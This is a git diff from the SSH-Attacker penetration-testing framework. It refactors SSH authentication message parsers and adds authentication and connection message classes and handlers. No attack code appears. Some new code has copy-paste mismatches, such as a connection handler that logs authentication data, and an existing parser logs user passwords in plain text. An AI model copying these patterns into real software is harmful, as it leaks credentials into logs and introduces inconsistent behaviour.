parser.parse(handshakeMessage); + Preparator preparator = handshakeMessage.getPreparator(context); + preparator.prepareAfterParse(false); // TODO REMOVE THIS CLIENTMODE FLAG + if (context.getChooser().getSelectedProtocolVersion().isDTLS()) { + handshakeMessage.setMessageSequence( + ((RecordLayerHint) handshakeStream.getHint()).getMessageSequence()); + } + handshakeMessage.getHandler(context).updateDigest(handshakeMessage, false); + handler.adjustContext(handshakeMessage); + addProducedContainer(handshakeMessage); + } catch (RuntimeException ex) { + // not being able to handle the handshake message results in an UnknownMessageContainer + UnknownHandshakeMessage message = new UnknownHandshakeMessage(); + message.setData(payload); + addProducedContainer(message); + } + } + + private void readHeartbeatProtocolData() { + HeartbeatMessage message = new HeartbeatMessage(); + readDataContainer(message, context); + }*/ + + private void readUnknownProtocolData() { + UnknownMessage message = new UnknownMessage(); + readDataContainer(message, context); + getLowerLayer().removeDrainedInputStream(); + } + @Override public void receiveMoreDataForHint(LayerProcessingHint hint) throws IOException { try { diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/handler/AuthenticationMessageHandler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/handler/AuthenticationMessageHandler.java new file mode 100644 index 000000000..7bac1e298 --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/handler/AuthenticationMessageHandler.java @@ -0,0 +1,38 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2023 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.protocol.authentication.handler; + +import de.rub.nds.modifiablevariable.util.ArrayConverter; +import de.rub.nds.sshattacker.core.layer.context.SshContext; +import de.rub.nds.sshattacker.core.protocol.authentication.message.AuthenticationMessage; +import de.rub.nds.sshattacker.core.protocol.common.ProtocolMessageHandler; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; + +public class AuthenticationMessageHandler extends ProtocolMessageHandler { + + private static final Logger LOGGER = LogManager.getLogger(); + + public AuthenticationMessageHandler(SshContext context) { + super(context); + } + + @Override + public void adjustContext(AuthenticationMessage message) { + sshContext.setLastHandledApplicationMessageData(message.getData().getValue()); + String readableAppData = + ArrayConverter.bytesToHexString( + sshContext.getLastHandledAuthenticationMessageData()); + if (sshContext.getTalkingConnectionEndType() + == sshContext.getChooser().getMyConnectionPeer()) { + LOGGER.debug("Received Data:" + readableAppData); + } else { + LOGGER.debug("Send Data:" + readableAppData); + } + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/handler/ConnectionMessageHandler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/handler/ConnectionMessageHandler.java new file mode 100644 index 000000000..6b574c61a --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/handler/ConnectionMessageHandler.java @@ -0,0 +1,38 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2023 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.protocol.authentication.handler; + +import de.rub.nds.modifiablevariable.util.ArrayConverter; +import de.rub.nds.sshattacker.core.layer.context.SshContext; +import de.rub.nds.sshattacker.core.protocol.common.ProtocolMessageHandler; +import de.rub.nds.sshattacker.core.protocol.connection.message.ConnectionMessage; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; + +public class ConnectionMessageHandler extends ProtocolMessageHandler { + + private static final Logger LOGGER = LogManager.getLogger(); + + public ConnectionMessageHandler(SshContext context) { + super(context); + } + + @Override + public void adjustContext(ConnectionMessage message) { + sshContext.setLastHandledApplicationMessageData(message.getData().getValue()); + String readableAppData = + ArrayConverter.bytesToHexString( + sshContext.getLastHandledAuthenticationMessageData()); + if (sshContext.getTalkingConnectionEndType() + == sshContext.getChooser().getMyConnectionPeer()) { + LOGGER.debug("Received Data:" + readableAppData); + } else { + LOGGER.debug("Send Data:" + readableAppData); + } + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/handler/UserAuthHostbasedMessageHandler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/handler/UserAuthHostbasedMessageHandler.java index e5ca7dc52..47c1c55b2 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/handler/UserAuthHostbasedMessageHandler.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/handler/UserAuthHostbasedMessageHandler.java @@ -67,7 +67,7 @@ public void checkSignature(UserAuthHostbasedMessage message) { public byte[] prepareSignatureInput(UserAuthHostbasedMessage message) { return ArrayConverter.concatenate( Converter.bytesToLengthPrefixedBinaryString( - context.getSessionID().orElse(new byte[] {})), + sshContext.getSessionID().orElse(new byte[] {})), new byte[] {message.getMessageId().getValue()}, Converter.stringToLengthPrefixedBinaryString(message.getUserName().getValue()), Converter.stringToLengthPrefixedBinaryString(message.getServiceName().getValue()), diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/handler/UserAuthSuccessMessageHandler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/handler/UserAuthSuccessMessageHandler.java index 24fe625af..427dc4ee0 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/handler/UserAuthSuccessMessageHandler.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/handler/UserAuthSuccessMessageHandler.java @@ -37,14 +37,16 @@ public void adjustContextAfterMessageSent() { } private void activateCompression() { - Chooser chooser = context.getChooser(); + Chooser chooser = sshContext.getChooser(); if (chooser.getCompressionMethodClientToServer() == CompressionMethod.ZLIB_OPENSSH_COM) { - context.getPacketLayer() + sshContext + .getPacketLayer() .updateCompressionAlgorithm( chooser.getCompressionMethodClientToServer().getAlgorithm()); } if (chooser.getCompressionMethodServerToClient() == CompressionMethod.ZLIB_OPENSSH_COM) { - context.getPacketLayer() + sshContext + .getPacketLayer() .updateDecompressionAlgorithm( chooser.getCompressionMethodServerToClient().getAlgorithm()); } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/message/AuthenticationMessage.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/message/AuthenticationMessage.java new file mode 100644 index 000000000..b1509ceaa --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/message/AuthenticationMessage.java @@ -0,0 +1,129 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2023 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.protocol.authentication.message; + +import de.rub.nds.modifiablevariable.ModifiableVariableProperty; +import de.rub.nds.modifiablevariable.bytearray.ModifiableByteArray; +import de.rub.nds.modifiablevariable.util.ArrayConverter; +import de.rub.nds.modifiablevariable.util.UnformattedByteArrayAdapter; +import de.rub.nds.sshattacker.core.constants.ProtocolMessageType; +import de.rub.nds.sshattacker.core.layer.context.SshContext; +import de.rub.nds.sshattacker.core.protocol.authentication.handler.AuthenticationMessageHandler; +import de.rub.nds.sshattacker.core.protocol.authentication.parser.AuthenticationMessageParser; +import de.rub.nds.sshattacker.core.protocol.authentication.preparator.AuthenticationMessagePreparator; +import de.rub.nds.sshattacker.core.protocol.authentication.serializer.AuthenticationMessageSerializer; +import de.rub.nds.sshattacker.core.protocol.common.ProtocolMessage; +import jakarta.xml.bind.annotation.adapters.XmlJavaTypeAdapter; +import java.io.InputStream; +import java.util.Arrays; + +public class AuthenticationMessage extends ProtocolMessage { + @XmlJavaTypeAdapter(UnformattedByteArrayAdapter.class) + private byte[] dataConfig = null; + + @ModifiableVariableProperty private ModifiableByteArray data; + + public AuthenticationMessage(byte[] dataConfig) { + super(); + this.dataConfig = dataConfig; + this.protocolMessageType = ProtocolMessageType.AUTHENTICATION; + } + + public AuthenticationMessage() { + super(); + this.protocolMessageType = ProtocolMessageType.AUTHENTICATION; + } + + public ModifiableByteArray getData() { + return data; + } + + public void setData(ModifiableByteArray data) { + this.data = data; + } + + public void setData(byte[] data) { + if (this.data == null) { + this.data = new ModifiableByteArray(); + } + this.data.setOriginalValue(data); + } + + public byte[] getDataConfig() { + return dataConfig; + } + + public void setDataConfig(byte[] dataConfig) { + this.dataConfig = dataConfig; + } + + @Override + public String toString() { + StringBuilder sb = new StringBuilder(); + sb.append("ApplicationMessage:"); + sb.append("\n Data: "); + if (data != null && data.getValue() != null) { + sb.append(ArrayConverter.bytesToHexString(data.getValue())); + } else { + sb.append("null"); + } + return sb.toString(); + } + + @Override + public String toCompactString() { + return "APPLICATION"; + } + + @Override + public String toShortString() { + return "APP"; + } + + @Override + public AuthenticationMessageHandler getHandler(SshContext sshContext) { + return new AuthenticationMessageHandler(sshContext); + } + + @Override + public AuthenticationMessageParser getParser(SshContext sshContext, InputStream stream) { + return new AuthenticationMessageParser(stream); + } + + @Override + public AuthenticationMessagePreparator getPreparator(SshContext sshContext) { + return new AuthenticationMessagePreparator(sshContext.getChooser(), this); + } + + @Override + public AuthenticationMessageSerializer getSerializer(SshContext sshContext) { + return new AuthenticationMessageSerializer(this); + } + + @Override + public int hashCode() { + int hash = 7; + hash = 43 * hash + Arrays.hashCode(this.dataConfig); + return hash; + } + + @Override + public boolean equals(Object obj) { + if (this == obj) { + return true; + } + if (obj == null) { + return false; + } + if (getClass() != obj.getClass()) { + return false; + } + final AuthenticationMessage other = (AuthenticationMessage) obj; + return Arrays.equals(this.dataConfig, other.dataConfig); + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/parser/AuthenticationMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/parser/AuthenticationMessageParser.java new file mode 100644 index 000000000..11f3867bf --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/parser/AuthenticationMessageParser.java @@ -0,0 +1,45 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2023 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.protocol.authentication.parser; + +import de.rub.nds.sshattacker.core.protocol.authentication.message.AuthenticationMessage; +import de.rub.nds.sshattacker.core.protocol.common.ProtocolMessageParser; +import java.io.InputStream; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; + +public class AuthenticationMessageParser extends ProtocolMessageParser { + + private static final Logger LOGGER = LogManager.getLogger(); + + /** + * Constructor for the Parser class + * + * @param stream + */ + public AuthenticationMessageParser(InputStream stream) { + super(stream); + } + + @Override + public void parse(AuthenticationMessage message) { + LOGGER.debug("Parsing ApplicationMessage"); + parseData(message); + message.setCompleteResultingMessage(getAlreadyParsed()); + } + + /** + * Reads the next bytes as the Data and writes them in the message + * + * @param msg Message to write in + */ + private void parseData(AuthenticationMessage msg) { + msg.setData(parseByteArrayField(getBytesLeft())); + LOGGER.debug("Data: {}", msg.getData().getValue()); + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/parser/UserAuthBannerMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/parser/UserAuthBannerMessageParser.java index 9e3e5fda4..9980d4737 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/parser/UserAuthBannerMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/parser/UserAuthBannerMessageParser.java @@ -43,19 +43,21 @@ private void parseData(UserAuthBannerMessage msg) { LOGGER.debug("Data: {}", msg.getData().getValue()); } - @Override - public UserAuthBannerMessage createMessage() { - return new UserAuthBannerMessage(); - } + /* + @Override + public UserAuthBannerMessage createMessage() { + return new UserAuthBannerMessage(); + } + */ - private void parseMessage() { + private void parseMessage(UserAuthBannerMessage message) { message.setMessageLength(parseIntField(DataFormatConstants.STRING_SIZE_LENGTH)); message.setMessage( parseByteString(message.getMessageLength().getValue(), StandardCharsets.UTF_8), false); } - private void parseLanguageTag() { + private void parseLanguageTag(UserAuthBannerMessage message) { message.setLanguageTagLength(parseIntField(DataFormatConstants.STRING_SIZE_LENGTH)); message.setLanguageTag( parseByteString( @@ -64,8 +66,8 @@ private void parseLanguageTag() { } @Override - protected void parseMessageSpecificContents() { - parseMessage(); - parseLanguageTag(); + protected void parseMessageSpecificContents(UserAuthBannerMessage message) { + parseMessage(message); + parseLanguageTag(message); } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/parser/UserAuthFailureMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/parser/UserAuthFailureMessageParser.java index a28f1b26d..6c9da5caf 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/parser/UserAuthFailureMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/parser/UserAuthFailureMessageParser.java @@ -32,19 +32,19 @@ public UserAuthFailureMessageParser(InputStream stream) { super(stream); } - @Override - public UserAuthFailureMessage createMessage() { - return new UserAuthFailureMessage(); - } - + /* @Override + public UserAuthFailureMessage createMessage() { + return new UserAuthFailureMessage(); + } + */ @Override public void parse(UserAuthFailureMessage message) { LOGGER.debug("Parsing UserAuthBannerMessage"); - parseMessageSpecificContents(); + parseMessageSpecificContents(message); message.setCompleteResultingMessage(getAlreadyParsed()); } - private void parsePossibleAuthenticationMethods() { + private void parsePossibleAuthenticationMethods(UserAuthFailureMessage message) { message.setPossibleAuthenticationMethodsLength( parseIntField(DataFormatConstants.STRING_SIZE_LENGTH)); message.setPossibleAuthenticationMethods( @@ -54,13 +54,13 @@ private void parsePossibleAuthenticationMethods() { false); } - private void parsePartialSuccess() { + private void parsePartialSuccess(UserAuthFailureMessage message) { message.setPartialSuccess(parseByteField(1)); } @Override - protected void parseMessageSpecificContents() { - parsePossibleAuthenticationMethods(); - parsePartialSuccess(); + protected void parseMessageSpecificContents(UserAuthFailureMessage message) { + parsePossibleAuthenticationMethods(message); + parsePartialSuccess(message); } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/parser/UserAuthHostbasedMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/parser/UserAuthHostbasedMessageParser.java index 900d273ef..beef6bf9a 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/parser/UserAuthHostbasedMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/parser/UserAuthHostbasedMessageParser.java @@ -36,19 +36,21 @@ public UserAuthHostbasedMessageParser(InputStream stream) { super(stream); } - @Override - protected UserAuthHostbasedMessage createMessage() { - return new UserAuthHostbasedMessage(); - } + /* + @Override + protected UserAuthHostbasedMessage createMessage() { + return new UserAuthHostbasedMessage(); + } + */ @Override public void parse(UserAuthHostbasedMessage message) { LOGGER.debug("Parsing UserAuthBannerMessage"); - parseMessageSpecificContents(); + parseMessageSpecificContents(message); message.setCompleteResultingMessage(getAlreadyParsed()); } - private void parsePubKeyAlgorithm() { + private void parsePubKeyAlgorithm(UserAuthHostbasedMessage message) { message.setPubKeyAlgorithmLength(parseIntField(DataFormatConstants.STRING_SIZE_LENGTH)); LOGGER.debug( "Public key algorithm length: " + message.getPubKeyAlgorithmLength().getValue()); @@ -58,7 +60,7 @@ private void parsePubKeyAlgorithm() { + backslashEscapeString(message.getPubKeyAlgorithm().getValue())); } - private void parseHostKeyBytes() { + private void parseHostKeyBytes(UserAuthHostbasedMessage message) { message.setHostKeyBytesLength(parseIntField(BinaryPacketConstants.LENGTH_FIELD_LENGTH)); LOGGER.debug("Host key bytes length: " + message.getHostKeyBytesLength().getValue()); message.setHostKeyBytes(parseByteArrayField(message.getHostKeyBytesLength().getValue())); @@ -67,14 +69,14 @@ private void parseHostKeyBytes() { + ArrayConverter.bytesToRawHexString(message.getHostKeyBytes().getValue())); } - private void parseHostName() { + private void parseHostName(UserAuthHostbasedMessage message) { message.setHostNameLength(parseIntField(DataFormatConstants.STRING_SIZE_LENGTH)); LOGGER.debug("Host name length: " + message.getHostNameLength().getValue()); message.setHostName(parseByteString(message.getHostNameLength().getValue())); LOGGER.debug("Host name: " + backslashEscapeString(message.getHostName().getValue())); } - private void parseClientUserName() { + private void parseClientUserName(UserAuthHostbasedMessage message) { message.setClientUserNameLength(parseIntField(DataFormatConstants.STRING_SIZE_LENGTH)); LOGGER.debug("Client user name length: " + message.getClientUserNameLength().getValue()); message.setClientUserName( @@ -85,7 +87,7 @@ private void parseClientUserName() { + backslashEscapeString(message.getClientUserName().getValue())); } - private void parseSignature() { + private void parseSignature(UserAuthHostbasedMessage message) { message.setSignatureLength(parseIntField(BinaryPacketConstants.LENGTH_FIELD_LENGTH)); LOGGER.debug("Signature length: " + message.getSignatureLength().getValue()); message.setSignature(parseByteArrayField(message.getSignatureLength().getValue())); @@ -93,12 +95,12 @@ private void parseSignature() { } @Override - protected void parseMessageSpecificContents() { - super.parseMessageSpecificContents(); - parsePubKeyAlgorithm(); - parseHostKeyBytes(); - parseHostName(); - parseClientUserName(); - parseSignature(); + protected void parseMessageSpecificContents(UserAuthHostbasedMessage message) { + super.parseMessageSpecificContents(message); + parsePubKeyAlgorithm(message); + parseHostKeyBytes(message); + parseHostName(message); + parseClientUserName(message); + parseSignature(message); } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/parser/UserAuthInfoRequestMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/parser/UserAuthInfoRequestMessageParser.java index e2ded505d..eeb8fd84c 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/parser/UserAuthInfoRequestMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/parser/UserAuthInfoRequestMessageParser.java @@ -36,40 +36,42 @@ public UserAuthInfoRequestMessageParser(InputStream stream) { super(stream); } - @Override - protected UserAuthInfoRequestMessage createMessage() { - return new UserAuthInfoRequestMessage(); - } + /* + @Override + protected UserAuthInfoRequestMessage createMessage() { + return new UserAuthInfoRequestMessage(); + } + */ @Override public void parse(UserAuthInfoRequestMessage message) { LOGGER.debug("Parsing UserAuthBannerMessage"); - parseMessageSpecificContents(); + parseMessageSpecificContents(message); message.setCompleteResultingMessage(getAlreadyParsed()); } - private void parseUserName() { + private void parseUserName(UserAuthInfoRequestMessage message) { message.setUserNameLength(parseIntField(DataFormatConstants.STRING_SIZE_LENGTH)); LOGGER.debug("User name length: " + message.getUserNameLength().getValue()); message.setUserName(parseByteString(message.getUserNameLength().getValue())); LOGGER.debug("User name: {}", backslashEscapeString(message.getUserName().getValue())); } - private void parseInstruction() { + private void parseInstruction(UserAuthInfoRequestMessage message) { message.setInstructionLength(parseIntField(DataFormatConstants.STRING_SIZE_LENGTH)); LOGGER.debug("Instruction length: " + message.getInstructionLength().getValue()); message.setInstruction(parseByteString(message.getInstructionLength().getValue())); LOGGER.debug("Instruction: " + backslashEscapeString(message.getInstruction().getValue())); } - private void parseLanguageTag() { + private void parseLanguageTag(UserAuthInfoRequestMessage message) { message.setLanguageTagLength(parseIntField(DataFormatConstants.STRING_SIZE_LENGTH)); LOGGER.debug("Language tag length: " + message.getLanguageTagLength().getValue()); message.setLanguageTag(parseByteString(message.getLanguageTagLength().getValue())); LOGGER.debug("Language tag: " + backslashEscapeString(message.getLanguageTag().getValue())); } - private void parsePromptEntries() { + private void parsePromptEntries(UserAuthInfoRequestMessage message) { message.setPromptEntryCount(parseIntField(DataFormatConstants.UINT32_SIZE)); LOGGER.debug("Number of prompt entries: " + message.getPromptEntryCount().getValue()); @@ -95,10 +97,10 @@ private void parsePromptEntries() { } @Override - protected void parseMessageSpecificContents() { - parseUserName(); - parseInstruction(); - parseLanguageTag(); - parsePromptEntries(); + protected void parseMessageSpecificContents(UserAuthInfoRequestMessage message) { + parseUserName(message); + parseInstruction(message); + parseLanguageTag(message); + parsePromptEntries(message); } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/parser/UserAuthInfoResponseMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/parser/UserAuthInfoResponseMessageParser.java index 6897b8e10..bf1c1a26f 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/parser/UserAuthInfoResponseMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/parser/UserAuthInfoResponseMessageParser.java @@ -33,19 +33,21 @@ public UserAuthInfoResponseMessageParser(InputStream stream) { super(stream); } - @Override - protected UserAuthInfoResponseMessage createMessage() { - return new UserAuthInfoResponseMessage(); - } + /* + @Override + protected UserAuthInfoResponseMessage createMessage() { + return new UserAuthInfoResponseMessage(); + } + */ @Override public void parse(UserAuthInfoResponseMessage message) { LOGGER.debug("Parsing UserAuthBannerMessage"); - parseMessageSpecificContents(); + parseMessageSpecificContents(message); message.setCompleteResultingMessage(getAlreadyParsed()); } - private void parseResponseEntries() { + private void parseResponseEntries(UserAuthInfoResponseMessage message) { message.setResponseEntryCount(parseIntField(DataFormatConstants.UINT32_SIZE)); LOGGER.debug("Number of response entries: " + message.getResponseEntryCount().getValue()); for (int i = 0; i < message.getResponseEntryCount().getValue(); i++) { @@ -60,7 +62,7 @@ private void parseResponseEntries() { } @Override - protected void parseMessageSpecificContents() { - parseResponseEntries(); + protected void parseMessageSpecificContents(UserAuthInfoResponseMessage message) { + parseResponseEntries(message); } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/parser/UserAuthKeyboardInteractiveMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/parser/UserAuthKeyboardInteractiveMessageParser.java index eb57629f4..b201f35b7 100755 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/parser/UserAuthKeyboardInteractiveMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/parser/UserAuthKeyboardInteractiveMessageParser.java @@ -34,19 +34,21 @@ public UserAuthKeyboardInteractiveMessageParser(InputStream stream) { super(stream); } - @Override - protected UserAuthKeyboardInteractiveMessage createMessage() { - return new UserAuthKeyboardInteractiveMessage(); - } + /* + @Override + protected UserAuthKeyboardInteractiveMessage createMessage() { + return new UserAuthKeyboardInteractiveMessage(); + } + */ @Override public void parse(UserAuthKeyboardInteractiveMessage message) { LOGGER.debug("Parsing UserAuthBannerMessage"); - parseMessageSpecificContents(); + parseMessageSpecificContents(message); message.setCompleteResultingMessage(getAlreadyParsed()); } - private void parseLanguageTag() { + private void parseLanguageTag(UserAuthKeyboardInteractiveMessage message) { message.setLanguageTagLength(parseIntField(DataFormatConstants.STRING_SIZE_LENGTH)); LOGGER.debug("Language tag length: " + message.getLanguageTagLength().getValue()); message.setLanguageTag( @@ -55,7 +57,7 @@ private void parseLanguageTag() { LOGGER.debug("Language tag: " + backslashEscapeString(message.getLanguageTag().getValue())); } - private void parseSubMethods() { + private void parseSubMethods(UserAuthKeyboardInteractiveMessage message) { message.setSubMethodsLength(parseIntField(DataFormatConstants.STRING_SIZE_LENGTH)); LOGGER.debug("Sub methods length: " + message.getSubMethodsLength().getValue()); message.setSubMethods( @@ -64,9 +66,9 @@ private void parseSubMethods() { } @Override - protected void parseMessageSpecificContents() { - super.parseMessageSpecificContents(); - parseLanguageTag(); - parseSubMethods(); + protected void parseMessageSpecificContents(UserAuthKeyboardInteractiveMessage message) { + super.parseMessageSpecificContents(message); + parseLanguageTag(message); + parseSubMethods(message); } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/parser/UserAuthNoneMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/parser/UserAuthNoneMessageParser.java index fdf6c9c28..e6da1e6fb 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/parser/UserAuthNoneMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/parser/UserAuthNoneMessageParser.java @@ -29,20 +29,22 @@ public UserAuthNoneMessageParser(InputStream stream) { super(stream); } - @Override - public UserAuthNoneMessage createMessage() { - return new UserAuthNoneMessage(); - } + /* + @Override + public UserAuthNoneMessage createMessage() { + return new UserAuthNoneMessage(); + } + */ @Override public void parse(UserAuthNoneMessage message) { LOGGER.debug("Parsing UserAuthBannerMessage"); - parseMessageSpecificContents(); + parseMessageSpecificContents(message); message.setCompleteResultingMessage(getAlreadyParsed()); } @Override - protected void parseMessageSpecificContents() { - super.parseMessageSpecificContents(); + protected void parseMessageSpecificContents(UserAuthNoneMessage message) { + super.parseMessageSpecificContents(message); } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/parser/UserAuthPasswordMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/parser/UserAuthPasswordMessageParser.java index bf0b287a0..eb15c8b8b 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/parser/UserAuthPasswordMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/parser/UserAuthPasswordMessageParser.java @@ -34,24 +34,26 @@ public UserAuthPasswordMessageParser(InputStream stream) { super(stream); } - @Override - public UserAuthPasswordMessage createMessage() { - return new UserAuthPasswordMessage(); - } + /* + @Override + public UserAuthPasswordMessage createMessage() { + return new UserAuthPasswordMessage(); + } + */ @Override public void parse(UserAuthPasswordMessage message) { LOGGER.debug("Parsing UserAuthBannerMessage"); - parseMessageSpecificContents(); + parseMessageSpecificContents(message); message.setCompleteResultingMessage(getAlreadyParsed()); } - private void parseChangePassword() { + private void parseChangePassword(UserAuthPasswordMessage message) { message.setChangePassword(parseByteField(1)); LOGGER.debug("Change password: " + message.getChangePassword().getValue()); } - private void parsePassword() { + private void parsePassword(UserAuthPasswordMessage message) { message.setPasswordLength(parseIntField(DataFormatConstants.STRING_SIZE_LENGTH)); LOGGER.debug("Password length: " + message.getPasswordLength().getValue()); message.setPassword( @@ -59,7 +61,7 @@ private void parsePassword() { LOGGER.debug("Password: " + message.getPassword().getValue()); } - private void parseNewPassword() { + private void parseNewPassword(UserAuthPasswordMessage message) { message.setNewPasswordLength(parseIntField(DataFormatConstants.STRING_SIZE_LENGTH)); LOGGER.debug("New password length: " + message.getNewPasswordLength().getValue()); message.setNewPassword( @@ -68,12 +70,12 @@ private void parseNewPassword() { } @Override - protected void parseMessageSpecificContents() { - super.parseMessageSpecificContents(); - parseChangePassword(); - parsePassword(); + protected void parseMessageSpecificContents(UserAuthPasswordMessage message) { + super.parseMessageSpecificContents(message); + parseChangePassword(message); + parsePassword(message); if (Converter.byteToBoolean(message.getChangePassword().getValue())) { - parseNewPassword(); + parseNewPassword(message); } } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/parser/UserAuthPkOkMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/parser/UserAuthPkOkMessageParser.java index 0186ce529..c6dca5ea5 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/parser/UserAuthPkOkMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/parser/UserAuthPkOkMessageParser.java @@ -34,19 +34,21 @@ public UserAuthPkOkMessageParser(InputStream stream) { super(stream); } - @Override - protected UserAuthPkOkMessage createMessage() { - return new UserAuthPkOkMessage(); - } + /* + @Override + protected UserAuthPkOkMessage createMessage() { + return new UserAuthPkOkMessage(); + } + */ @Override public void parse(UserAuthPkOkMessage message) { LOGGER.debug("Parsing UserAuthBannerMessage"); - parseMessageSpecificContents(); + parseMessageSpecificContents(message); message.setCompleteResultingMessage(getAlreadyParsed()); } - private void parsePubkey() { + private void parsePubkey(UserAuthPkOkMessage message) { message.setPubkeyLength(parseIntField(DataFormatConstants.STRING_SIZE_LENGTH)); LOGGER.debug("Pubkey length: " + message.getPubkeyLength().getValue()); message.setPubkey( @@ -54,7 +56,7 @@ private void parsePubkey() { LOGGER.debug("Pubkey: {}", backslashEscapeString(message.getPubkey().getValue())); } - private void parsePubkeyAlgName() { + private void parsePubkeyAlgName(UserAuthPkOkMessage message) { message.setPubkeyAlgNameLength(parseIntField(DataFormatConstants.STRING_SIZE_LENGTH)); LOGGER.debug( "Pubkey algorithm name length: " + message.getPubkeyAlgNameLength().getValue()); @@ -67,8 +69,8 @@ private void parsePubkeyAlgName() { } @Override - protected void parseMessageSpecificContents() { - parsePubkeyAlgName(); - parsePubkey(); + protected void parseMessageSpecificContents(UserAuthPkOkMessage message) { + parsePubkeyAlgName(message); + parsePubkey(message); } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/parser/UserAuthPubkeyMessageParser.java 